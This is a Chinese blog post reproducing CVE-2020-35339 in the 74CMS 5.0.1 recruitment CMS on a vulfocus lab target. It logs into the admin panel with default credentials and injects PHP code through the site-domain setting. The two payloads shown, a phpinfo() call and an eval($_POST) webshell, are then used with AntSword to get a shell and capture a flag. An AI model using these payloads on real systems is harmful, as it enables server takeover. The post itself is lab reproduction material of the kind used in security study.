骑士cms任意代码执行(CVE-2020-35339)

最新推荐文章于 2023-02-07 18:27:43 发布
最新推荐文章于 2023-02-07 18:27:43 发布
阅读量3.1k 收藏 6
点赞数 3
分类专栏: 复现 文章标签: 网络安全 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34341458/article/details/124129099
版权

本文章仅供学习使用,如用作非法用途,概不负责

0x01 漏洞介绍

骑士人才系统是一项基于PHP+MYSQL为核心开发的一套免费 + 开源专业人才招聘系统。由太原迅易科技有限公司于2009年正式推出。为个人求职和企业招聘提供信息化解决方案, 骑士人才系统具备执行效率高、模板切换自由、后台管理功能灵活、模块功能强大等特点,自上线以来一直是职场人士、企业HR青睐的求职招聘平台。经过7年的发展,骑士人才系统已成国内人才系统行业的排头兵。系统应用涉及政府、企业、科研教育和媒体等行业领域,用户已覆盖国内所有省份和地区。 2016年全新推出骑士人才系统基础版,全新的“平台+插件”体系,打造用户“DIY”个性化功能定制,为众多地方门户、行业人才提供一个专业、稳定、方便的网络招聘管理平台,致力发展成为引领市场风向的优质高效的招聘软件。

影响版本:74CMS 5.0.1

0x02 靶场地址

http://vulfocus.io/#/dashboard?image_id=cd8de842-58fc-4d89-9764-edf9f8e0eb81
名称:vulfocus/74cms_cve_2020_35339:latest
在这里插入图片描述

0x03 复现

  1. 启动并访问给出的靶场地址
    在这里插入图片描述
    在url后面加上:/index.php?m=Admin 访问后台,账号密码均为:adminadmin
    在这里插入图片描述
  2. 进入后台后,点击:系统——网站配置——在网站域名中填写下面数据使页面返回phpinfo
http://127.0.0.1/.',phpinfo(),'/.com

在这里插入图片描述
然后保存,保存后刷新当前页面,phpinfo页面便映入眼帘。

在这里插入图片描述
此时再进行登录,登录成功后,只会显示更详细的phpinfo界面,没有其他内容,建议不要随便使用。
然后修改一下代码,便可以直接getshell

getshell

原环境不能正常使用,只能重启环境继续下面的操作。
依旧是上面的步骤,不过代码换成:

http://127.0.0.1/.',eval($_POST[a]),'/.com

在这里插入图片描述
然后保存,刷新当前页面
在这里插入图片描述
然后直接上蚁剑连接
在这里插入图片描述
获得flag
在这里插入图片描述

0x04 修复建议

哎,升级版本吧

参考(实现原理):https://blog.csdn.net/qq_41252520/article/details/113850389

Redamancy——
关注
  • 3
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
74cms代码执行漏洞
01-03
74cms代码执行漏洞 docker
74CMS 5.0.1后台getshell(CVE-2020-35339)分析
qq_41252520的博客
02-18 2751
0x0 漏洞简介 骑士人才系统是一项基于PHP+MYSQL为核心开发的一套免费 + 开源专业人才招聘系统。由太原迅易科技有限公司于2009年正式推出。为个人求职和企业招聘提供信息化解决方案, 骑士人才系统具备执行效率高、模板切换自由、后台管理功能灵活、模块功能强大等特点,自上线以来一直是职场人士、企业HR青睐的求职招聘平台。经过7年的发展,骑士人才系统已成国内人才系统行业的排头兵。系统应用涉及政府、企业、科研教育和媒体等行业领域,用户已覆盖国内所有省份和地区。 2016年全新推出骑士人才系统基础版,全新的
PTB-CVE
zip471642048的博客
05-05 980
文章目录Apache HTTPD 多后缀解析漏洞 Apache HTTPD 多后缀解析漏洞 如果运维人员给.php后缀增加了处理器: AddHandler application/x-httpd-php .php 那么,在有多个后缀的情况下,只要一个文件含有.php后缀的文件即将被识别成PHP文件,没必要是最后一个后缀。利用这个特性,将会造成一个可以绕过上传白名单的解析漏洞。 上传一个以jpg为后缀的一句话木马但是包含.php 会被成功解析成php ...
【漏洞复现-骑士cms-代码执行】vulfocus/骑士cms_cve_2020_35339
10-13 1610
骑士cms-代码执行】植入到可执行的文件中
vulfocus——骑士cms任意代码执行(CVE-2020-35339
m0_62063669的博客
09-17 869
5.访问shell地址:/Application/Home/Conf/config.php。骑士人才系统是一项基于PHP+MYSQL为核心开发的一套免费 + 开源专业人才招聘系统。(不知道这里为什么没出现flag,然后在phpinfo找到flag)后台账号密码均为adminadmin。4.构造Payload验证漏洞存在。6.getshell (改包)3.在第三步进行抓包。2.找到后台登陆界面。
在线复现漏洞cve-2020-35339(加日常想法)
FODKING的博客
04-20 1343
最近有半年没写了,感觉有很多东西想写,还是怕没人看,近期发现了一个在线的漏洞测试平台,大家可以看看。
74cms 任意代码执行CVE-2020-35339
weixin_44047654的博客
11-22 1104
74cms 任意代码执行CVE-2020-35339
Vulfocus 入门+初级
大雾
05-20 3183
名称: 命令执行漏洞 描述: 命令执行(Command Execution)漏洞即黑客可以直接在Web应用中执行系统命令,从而获取敏感信息或者拿下shell权限 命令执行漏洞可能造成的原因是Web服务器对用户输入命令安全检测不足,导致恶意代码执行 flag 存放在tmp路径下 名称: vulshare/python-flag:latest 描述: 目录浏览漏洞属于目录遍历漏洞的一种,目录浏览漏洞是由于网站存在配置缺陷,存在目录可浏览漏洞,这会导致网站很多隐私文件与目录泄露,比如数据库备份文件、配置.
骑士cms骑士cms快速搭建
xiaomaseo的博客
03-23 1671
骑士cms,如何让人才网快速建站,人才招聘一直是一个有市场的行业,特别是近些年来互联网发展的速度越来越快,人才招聘的重心在不断的向线上招聘转移,骑士cms的作用就是为人才网站提供人才招聘的各项功能,在这种阶段可以选用骑士cms系统的基础版,通过一系列基础的发布职位、下载简历、职位置顶、简历置顶等实用功能,能够保证人才网站在低成本运营的同时还有机会实现流量转化。 骑士cms可以实现云端一键升级,告别传统的FTP上传下载的覆盖升级方式,现在只需骑士cms后台一键完成升级。使用简单便捷,支持升级回滚操.
74cms 骑士人才系统 v5.0.1 正式版
10-22
骑士cms人才系统是一项基于PHP+MYSQL为核心开发的一套免费 + 开源专业人才招聘系统。软件具执行效率高、模板自由切换、后台管理功能方便等诸多优秀特点。全部代码都为骑士网络原创,有着完全的知识产权。凭借骑士网络的不断创新精神和认真的工作态度,骑士人才系统已成国内同类软件中的最好用的人才系统。 骑士cms人才系统 v5.0.1 更新内容:新增:后台增加跳转页面新增:短信预警提醒,方便客户及时充值新增:企业与个人账号通用新增:未付费且登录的企业单独呈现,方便追踪客户新增:后台统计增加列表页。方便追踪客户新增:导出简历增加时间段、年龄段、性别等条件筛选新增:简历增加项目经验新增:PC端支持https新增:对接企查查新增:关注公众号领红包,快速吸粉新增:专题招聘会触屏版新增:事业单位招考触屏版新增:企业专访触屏版新增:内置节日主题优化:表单填写优化:提交操作增加等待提醒优化:套餐改为点数,对简历进行分级收费优化:小程序深度优化优化:系统日志显示企业名称与个人名字,方便追踪客户
CVE-2020-13925 Apache Kylin 远程命令执行漏洞.md
04-12
CVE-2020-13925 Apache Kylin 远程命令执行漏洞
CSRF的脚本,可以做测试使用.zip
05-28
CSRF相关脚本,供大家学习参考,请在靶场或受允许的页面进行测试,道路千万条,安全第一条,希望大家好好学习,为国家为社会做贡献
CVE-2020-21224 ClusterEngineV4.0 远程代码执行.md
04-11
CVE-2020-21224 ClusterEngineV4.0 远程代码执行
cve-2020-14750.zip9(补丁升级)
05-26
2020年11月2日,Oracle官方发布了此安全警报针对Oracle WebLogic Server中的远程代码执行漏洞CVE-2020-14750,此漏洞可以在没有身份验证的情况下进行远程攻击,也就是说,可以在不需要用户名和密码的情况下通过网络...
CVE-2020-11890:CVE-2020-11890
03-10
CVE-2020-11890:用户组表类中的输入验证不正确可能会导致RCE的ACL配置损坏 关联 PoC 受影响的版本:3.9.17之前的Joomla核心 用户要求:管理员帐户(非超级管理员) 获得访问权限:创建一个新的超级管理员,然后触发...
CVE-2020-36179:CVE-2020-36179~82 Jackson-databind SSRF&RCE
05-29
描述CVE-2020-36179:2.9.10.8之前的FasterXML jackson-databind 2.x处理与oadd.org.apache.commons.dbcp.cpdsadapter.DriverAdapterCPDS相关的序列化小工具和键入之间的交互。 CVE-2020-36180:FasterXML jackson-...
骑士 74CMS V3.4漏洞
weixin_61842894的博客
02-07 731
骑士 74CMS V3.4
CVE-2020-13249
最新发布
09-08
根据提供的引用内容,没有包含关于CVE-2020-13249的信息。请提供更多相关信息以便我为您提供准确的答案。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [【漏洞通告】Apache DolphinScheduler高危漏洞(CVE-2020-11974、CVE-2020-13922)](https://blog.csdn.net/weixin_45728976/article/details/108537133)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* [CVE-2020-36179:CVE-2020-36179~82 Jackson-databind SSRF&RCE](https://download.csdn.net/download/weixin_42181545/19185756)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值